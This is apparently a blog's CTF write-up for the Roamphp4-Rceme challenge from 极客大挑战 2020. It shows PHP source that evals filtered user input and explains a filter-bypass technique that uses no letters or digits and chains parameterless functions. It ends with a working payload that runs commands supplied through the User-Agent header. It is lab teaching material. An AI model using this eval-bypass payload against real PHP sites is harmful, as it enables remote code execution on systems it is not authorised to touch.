[极客大挑战 2020]Roamphp4-Rceme

2021-10-01 16:36

|

0

|

773

|

403 字

|

3 分钟

[极客大挑战 2020]Roamphp4-Rceme

源码

<?php
error_reporting(0);
session_start();
if(!isset($_SESSION['code'])){
    $_SESSION['code'] = substr(md5(mt_rand().sha1(mt_rand)),0,5);
}

if(isset($_POST['cmd']) and isset($_POST['code'])){

    if(substr(md5($_POST['code']),0,5) !== $_SESSION['code']){
        die('<script>alert(\'Captcha error~\');history.back()</script>');
    }
    $_SESSION['code'] = substr(md5(mt_rand().sha1(mt_rand)),0,5);
    $code = $_POST['cmd'];
    if(strlen($code) > 70 or preg_match('/[A-Za-z0-9]|\'|"|`|\ |,|\.|-|\+|=|\/|\\|<|>|\$|\?|\^|&|\|/ixm',$code)){
        die('<script>alert(\'Longlone not like you~\');history.back()</script>');
    }else if(';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $code)){
        @eval($code);
        die();
    }
}
?>

知识点

无字母数字webshell之提高篇

解题步骤

f12提示有swp文件，/.index.php.swp可以下载下来，然后去Linux的vim -r进行源码读取。
过滤了非常多的东西。需要非数字字母进行代码执行。
可以想到url反码。但是下面还有一个要求，需要无参函数：

之前的url反码需要（~xxx），在这里不能用了。所以用到数组的方式

[%aa] 返回1，所以经过 ! 取反后就是0，这样便可以索引前面数组里的内容了，即 [~%89%9E%8D%A0%9B%8A%92%8F][!%aa] 可以取到数组里的 ~%89%9E%8D%A0%9B%8A%92%8F 了。除了 [%aa] 还有 [%FF] 也可以返回1，所以经过 ! 取反后的 [!%FF] 就是0。
无参数RCE的基本思想是：使用无参数函数（形如 xxx()）来获取程序的信息，再将信息传递给危险函数。所以积累一点无参数函数和危险函数即可：

常用的无参数函数（也可以考虑需要使用的时候再搜索）
getallheaders()
get_defined_vars()
getenv()
session_id()
getcwd()
dirname()
chdir()
数组函数
next()
end()

配上快速md5碰撞脚本，就可以解了
payload
cmd=[~%8C%86%8C%8B%9A%92][~%CF]([~%91%9A%87%8B][~%CF]([~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C][~%CF]()));&code=0a8bf6eca3449743
然后在user-agent头部那里输入要执行的代码即可

无参函数利用无数字字母shell

暂无评论

发送评论编辑评论

Markdown

邮件提醒

|´・ω・)ノ

ヾ(≧∇≦*)ゝ

(☆ω☆)

（╯‵□′）╯︵┴─┴

￣﹃￣

(/ω＼)

∠( ᐛ 」∠)＿

(๑•̀ㅁ•́ฅ)

→_→

୧(๑•̀⌄•́๑)૭

٩(ˊᗜˋ*)و

(ノ°ο°)ノ

(´இ皿இ｀)

⌇●﹏●⌇

(ฅ´ω`ฅ)

(╯°A°)╯︵○○○

φ(￣∇￣o)

ヾ(´･･｀｡)ノ"

( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃

(ó﹏ò｡)

Σ(っ °Д °;)っ

( ,,´･ω･)ﾉ"(´っω･｀｡)

╮(╯▽╰)╭

o(*////▽////*)q

＞﹏＜

( ๑´•ω•) "(ㆆᴗㆆ)

颜文字

Emoji

小恐龙

花!